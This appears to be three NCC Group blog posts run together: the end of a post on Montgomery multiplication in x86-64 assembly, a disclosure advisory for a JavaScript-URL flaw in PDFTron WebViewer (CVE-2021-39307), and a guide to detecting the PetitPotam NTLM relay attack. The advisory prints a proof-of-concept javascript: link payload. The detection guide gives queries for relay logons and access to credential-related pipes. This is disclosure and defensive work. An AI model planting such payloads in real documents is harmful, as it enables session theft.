In some cases, specialized instructions are added to the programming model that provide significant speed-up for very specific algorithms. While many people first think of the very well-known ‘Intel MMX instructions for multimedia algorithms’, there have been many other less prominent instances over the years. Intel’s ADX (Multi-Precision Add-Carry Instruction Extensions) feature provides two new addition instructions that can help increase the performance of arbitrary precision arithmetic. Intel’s BMI2 (Bit Manipulation Instruction Set 2) feature contains a new flag-friendly multiplication instruction among several others not relevant to our purpose. Processors supporting these feature extensions have been shipping since roughly 2015, and may offer a significant performance benefit.

The ‘native’ Montgomery multiplication Rust code last shown above involved a large amount of addition operations (outside of the array index calculation) centered around lines 112-114, 118, 124-125 and 129. These operations are building larger-precision results (e.g., a full partial product) from smaller-precision instructions (e.g., a 64-bit add). Normally, a series of ‘Add with carry’ (ADC) instructions are used that add two operands and the carry(in) flag to produce a sum and a new carry(out) flag. The instructions are ordered to work on the least-to-most significant operand limb one at a time. The dependence upon a single carry flag presents a bottleneck that allows just one chain to operate at a time in principle, thus limiting parallelism.

Intel realized the limitation of a single carry flag, and introduced two instructions that effectively use different carry flags. This allows the programmer to express more instruction-level parallelism by describing two chains that can be operating at the same time. The ADX instruction extensions provide:

  • ADCX Adds two 64-bit unsigned integer operands plus the carry flag and produces a 64-bit unsigned integer result with the carry out value set in the carry flag. This does not affect any other flags (as the prior ADD instructions did).
  • ADOX Adds two 64-bit unsigned integer operands plus the overflow flag and produces a 64-bit unsigned integer result with the carry out value set in the overflow flag. This does not affect any other flags. Note that ordinarily the overflow flag is used with signed arithmetic.

Meanwhile, the Rust code also contains a significant amount of multiplication operations interspersed amongst the addition operations noted above. The ordinary MUL instruction multiplies two 64-bit unsigned integer operands to produce a 128-bit result placed into two destination registers. However, this result also affects the carry and overflow flags – meaning it will interfere with our ADCX and ADOX carry chains. Furthermore, the output registers must be %rax and %rdx which limits flexibility and constrains register allocation. To address this, the BMI2 instruction extensions include:

  • MULX Multiplies two 64-bit unsigned integer operands and produces an unsigned 128-bit integer result stored into two destination registers. The flags are not read nor written, thus enabling the interleaving of add-with-carry operations and multiplications.

The two new addition instructions inherently overwrite one of the source registers with the destination result. In other words, adcxq %rax, %r10 will add %rax to %r10 with the carry flag, and place the result into %r10 and the carry flag. The new multiplication instruction requires one of its source operands to always be in %rdx. In other words, mulxq %rsi, %rax, %rbx is the multiplication of %rsi by %rdx with the lower half of the result written into %rax and the upper half written into %rbx. The q suffix on each instruction is simply the quadword suffix syntax of the GNU Assembler.

Register Allocation

The three new instructions described above will form the core of the Montgomery multiplication function in assembly. Since the x86 instruction set is rather register constrained, a strategy that minimizes the actual working set of active values must be developed. We saw earlier how only seven limbs of temp are in play at any one time and the outer loop index i formed a base address when accessing temp. Consider a ‘middle’ iteration of the outer loop, as the simpler first iteration can be derived from this. This flattened iteration is implemented as an assembler macro that can be later placed singly inside an outer loop or in multiple back-to-back instances that unroll the outer loop.

The first inner loop calculating the partial product will be unrolled and assumes temp[i + 0..6] (exclusive) arrives in registers %r10 through %r15. The %rax and %rbx registers will temporarily hold multiplication results as we step through a.v[0..6] * b.v[i] (with a fixed i). The a.v[0..6] (exclusive) operands will involve a relative address using %rsi as the base, while the fixed operand will be held in %rdx. At the end of the inner loop, the %rbp register will be used to hold temp[i + 6].

The second inner loop implementing the reduction step will also be unrolled and assumes temp[i + 0..7] (exclusive) is provided in the registers %r10 through %r15 along with %rbp. The register strategy for holding the multiplication results is modified slightly here due to A) the add instruction requiring a source operand being overwritten by the result, and B) the calculation process effectively shifts the working set to the right by one step (thus the least significant value will drop away, but its carry out will still propagate).

Basic Register Allocation Structure/Plan

The general plan for register allocation within one ‘middle’ iteration of the outer loop is shown above in simplified fashion. The upper crimson triangle implements the partial product inner loop and is executed first. The lower green triangle implements the reduction step and executes second. Double-width boxes hold the multiplication results, and the red/green arrows identify the two separate carry chains of the addition instructions. The nearly side-by-side placement of the addition operations is meant to hint at their parallel operation. While things visually appear to step forward in a nice orderly single-cycle progression, multiplication latencies are significantly higher than addition so the out-of-order capabilities of the micro-architecture is crucial to performance. The output data within %r10 through %r15 is compatible with input data within %r10 through %r15, so instances of this block can be repeated one after another.

The initial iteration of the outer loop is a simplification of that shown above. Simply assume %r10 through %r15 start at zero and remove everything no longer needed.

Montgomery Multiplication in Assembly

The bulk of the hard work has now been done. A macro implementing one iteration of the outer loop in x86-64 assembly is shown below. The fully unrolled outer loop is implemented with a simplified initial instance followed by five back-to-back instantiations of this code. [Code excerpt on GitHub]

The final Montgomery multiplication function is fully implemented in src/mont_mul_asm.S and is a straightforward concatenation of the following elements:

  1. A function label attached to the prologue. Any registers used by the function that are required to be preserved across function calls must be pushed to the stack prior to use. The label corresponds to the extern “C” clause in the Rust lib.rs source file.
  2. The MODULUS is stored as quadword constants and their address loaded into the %rcx register. These values are utilized in the reduction step.
  3. An instance of the simplified first outer loop.
  4. Five instances of the macro shown above. Note the presence of offset parameter on line 82. This is used to form an index into b.v[i] on line 84 and it is increased by 8 on each instance.
  5. The final modulus correction logic is virtually identical to what has already been seen for addition: subtract the modulus from the initial result and return that if there is no borrow, otherwise return the initial result.
  6. A function epilogue that pops the registers from the stack that were pushed there in the prologue.

Again, the full routine can be seen in its totality here on GitHub. Note that the Rust build.rs source file integrates everything with cargo such that there are no additional steps required to build.

A final aside: Unrolling Rust and intrinsics

The code repository already fully supports further experimentation with A) flattened Rust code that uses the same strategy to minimize its active working set, and B) Rust intrinsics. Let’s briefly touch on both topics before including them in the benchmarking results described next.

The assembly code can be back-ported or re-implemented back into flat/raw Rust with the same ‘register allocation’ strategy to manage the active working set and avoid declaring a temp[] array. This gives surprisingly good results and suggests that a modern micro-architecture can look even further ahead, perhaps up to 200 (simple) instructions, to extract more instruction level parallelism from separate but adjacent carry chains. Hence the old adage: “You can rarely outsmart the compiler”. Look for the fe_mont_mul_raw() function.

Alternatively, Rust provides intrinsics that specifically target the ADCX, ADOX and MULX instructions. Unfortunately, the toolchain cannot emit the first two yet. Nonetheless, the fe_mont_mul_intrinsics() function shows exactly how this is coded. The MULX instruction is indeed emitted and does deliver a significant benefit by not interfering with the flags.

Benchmarking

Everything is ready to go – let’s benchmark! Here are sample results from my machine:

$ RUSTFLAGS="--emit asm -C target-cpu=native" cargo bench
Ubuntu 20.04.2 LTS on Intel Core i7-7700K CPU @ 4.20GHz with Rust version 1.53

1. Addition X 1000 iterations                                       [3.6837 us 3.6870 us 3.6905 us]
2. Subtraction X 1000 iterations                                  [3.1241 us 3.1242 us 3.1244 us]
3. Multiplication by BigUint X 1000 iterations:            [517.54 us 517.68 us 517.85 us]
4. Multiplication in Rust (mont1 blog) X 1000 iter:     [46.037 us 46.049 us 46.064 us]
5. Multiplication in flat Rust X 1000 iterations:           [34.719 us 34.741 us 34.763 us]
6. Multiplication in Rust with intrinsics X 1000 iter:    [31.497 us 31.498 us 31.500 us]
7. Multiplication in Rust with assembly X 1000 iter:    [29.573 us 29.576 us 29.580 us]

There are three caveats to consider while interpreting the above results. First and foremost, consider these results as a qualitative sample rather than a definitive result. Second, each result is presented as minimum, nominal and maximum timing – so the key figure is the central number. Finally, each function is timed across 1000 iterations, so the timing result for a single iteration correspond to units of nanoseconds rather than microseconds. On this machine, the Montgomery multiplication function written in assembly language takes approximately 29.576 ns.

The baseline non-Montgomery multiplication function utilizing BigUint is shown in entry 3. The (non BigUint) Montgomery multiplication function developed in the prior post is entry 4. The benefits of actively managing the working set and unrolling the inner loops can be seen in entry 5. The benefit of the MULX intrinsic appears in entry 6. Pure assembly is shown in entry 7. While the assembly routine provides more than 15X performance improvement over the BigUint reference implementation in entry 3, it also utilizes the CMOV instructions in the final correction steps to reduce timing side-channel leakage relative to all other entries.

What we learned

We started with a reference multiplication routine utilizing the BigUint library crate as our performance baseline. Then we adapted the Montgomery multiplication function in Rust from the prior blog post into an equivalent x86-64 assembly language version that is over 15X faster than the baseline. Along the way we looked at how the micro-architecture supports increased parallelism, how several new instructions in the architecture also support increased parallelism, and got insight into how to use the instructions with planned register allocations. A few hints (leading to intentionally unanswered questions) were dropped regarding the potential of raw Rust and intrinsics, with further investigation left as an exercise for the reader. Finally, we benchmarked a broad range of approaches.

The code is available publicly on GitHub, self-contained and ready for further experimentation.

What is next?

As mentioned at the start, pairing-based cryptography involves a wide range of algorithms, techniques and optimizations. This will provide a large menu of follow-on optimization topics which may ultimately include the polynomial-related functionality that zkSNARKS utilize with pairings. Stay tuned!!

Thank you

The author would like to thank Parnian Alimi, Paul Bottinelli and Thomas Pornin for detailed review and feedback. The author is solely responsible for all remaining issues.

Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI (CVE-2021-39307)

14 September 2021 at 13:52
Vendor: PDFTron
Vendor URL: https://www.pdftron.com/
Versions affected: WebViewer UI 8.0 or below
Systems Affected: Web applications hosting the affected software
Author: Liyun Li <liyun.li[at]nccgroup[dot]com>
CVE Identifier: CVE-2021-39307

Summary

PDFTron’s WebViewer UI 8.0 or below renders dangerous URLs as hyperlinks in supported documents, including JavaScript URLs, allowing the execution of arbitrary JavaScript code.

Impact

An attacker could steal a victim’s session tokens, log their keystrokes, steal private data, or perform privileged actions in the context of a victim’s session.

Details

JavaScript URLs are dangerous because they can be used to execute arbitrary JavaScript code when visited. Built-in PDF readers in modern browsers, such as Mozilla’s pdf.js, do not render code-execution-capable URLs as hyperlinks to avoid this issue.

To reproduce this issue, first create the following HTML document and save the rendered content as PDF on a modern browser.

<h2><a href="javascript:document.write`
  <div>
    <form method='GET' action='https://nccgroup.com'>
      <input type='submit' value='NCC Group'>
    </form>
    <script>alert(document.domain)</script>
  </div>
`">Click me</a></h2>

After that, use the “d” parameter to include the uploaded PDF file (e.g. http://webviewer-instance/#d=https://domain.tld/test.pdf).

Support for rendering clickable JavaScript and Data URL should be removed.

Recommendation to Users

Upgrade WebViewer UI to 8.1, available at https://www.pdftron.com/documentation/web/download.

Vendor Communication

2021-08-16: Issue reported to PDFTron
2021-08-17: PDFTron confirmed the vulnerability
2021-08-23: PDFTron issued patch to nightly build
2021-09-09: PDFTron WebViewer 8.1 released 
2021-09-14: Advisory released by NCC Group

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  September 14, 2021

Written by:  Liyun Li

Detecting and Hunting for the PetitPotam NTLM Relay Attack

23 September 2021 at 18:34

Overview

During the week of July 19th, 2021, information security researchers published a proof of concept tool named “PetitPotam” that exploits a flaw in Microsoft Windows Active Directory Certificate Servers with an NTLM relay attack.  The flaw allows an attacker to gain administrative privileges of an Active Directory Certificate Server once on the network with another exploit or malware infecting a system.  

The following details are provided to assist organizations in detecting and threat hunting for this and other similar types of threats.

Preparation

The default settings of Windows logging do not often catch advanced threats.  Therefore, Windows Advanced Audit Logging must be optimally configured to detect and to be able to threat hunt PetitPotam and similar attacks.

Organizations should have a standard procedure to configure the Windows Advanced Audit Policies as a part of a complete security program and have each Windows system collect locally significant events.  NCC Group recommends using the following resource to configure Windows Advanced Audit Policies:

Log rotation can be another major issue with Windows default log settings.  Both the default log size should be increased to support detection engineering and threat hunting.

Ideally, organizations should forward event logs to a log management or SIEM solution to operationalize detection alerts and provide a central console where threat hunting can be performed.  Alternatively, with optimally configured log sizes, teams can run tools such as PowerShell or LOG-MD to hunt for malicious activity against the local log data.

Detecting and Threat Hunting NTLM Relay Attacks

The PetitPotam attack targets Active Directory servers running certificate services, so this will be the focus of the detection and hunting.  Event log data is needed to detect or hunt for PetitPotam. The following settings and events can be used to detect this malicious activity:

Malicious Logins

PetitPotam will generate an odd login that can be used to detect and hunt for indications of execution.  To collect Event ID 4624, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Logon/Logoff – Audit Logon = Success and Failure

The following query logic can be used:

  • Event Log = Security
  • Event ID = 4624
  • User = ANONYMOUS LOGON
  • Authentication Package Name = NTLM*
  • Elevated Token – *1842

Sample Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

  • “event.code”=”4624″ and winlog.event_data.AuthenticationPackageName=”NTLM*” and winlog.event_data.ElevatedToken=”*1842″ | PackageName:=winlog.event_data.AuthenticationPackageName | Token:=winlog.event_data.ElevatedToken | WS_Name:=winlog.event_data.WorkstationName | LogonProcess:=winlog.event_data.LogonProcessName | LogonType:=winlog.event_data.LogonType | ProcessName:=winlog.event_data.ProcessName | UserName:=winlog.event_data.SubjectUserName | Domain:=winlog.event_data.SubjectDomainName | TargetDomain:=winlog.event_data.TargetDomainName | TargetUser:=winlog.event_data.TargetUserName | Task:=winlog.event_data.TargetUserName| table([event.code, @timestamp, host.name, event.outcome, WS_Name, UserName, Domain, Token, PackageName, LogonProcess, LogonType, ProcessName, TargetDomain, TargetUser, Task])

Malicious Share Access

PetitPotam will generate odd network share connections that can be used to detect and hunt for indications of execution.  To collect Event ID 5145, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Object Access – Audit Detailed File Share = Success
  • Object Access – File Share = Success

The following query logic can be used:

  • Event Log = Security
  • Event ID = 5145
  • Object Name = *IPC*
  • Target Name = (“lsarpc” or “efsrpc” or “lsass” or “samr” or “netlogon”

Sample Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

  • “event.code”=”5145” and winlog.event_data.ShareName=*IPC* and (“lsarpc” or “efsrpc” or “lsass” or “samr” or “netlogon” or “srvsvc”)
    | Status:= keywords[0] | Src_IP:= winlog.event_data.IpAddress | PID:= winlog.process.pid | UserName:=winlog.event_data.SubjectUserName | Domain:= winlog.event_data.SubjectDomainName | Target_File:= winlog.event_data.RelativeTargetName | Path:= winlog.event_data.ShareLocalPath | Share:= winlog.event_data.ShareName | ObjectType:=winlog.event_data.ObjectType
    | table([event.code, @timestamp, host.name, Status, Src_IP, PID, UserName, Domain, task, Path, Share, Target_File, ObjectType])

If you find any false positives, validating them and excluding or refining the query may be needed.  We hope this information can assist your detection and threat hunting efforts to detect this and similar types of attacks.

Additional Reading and Resources

❌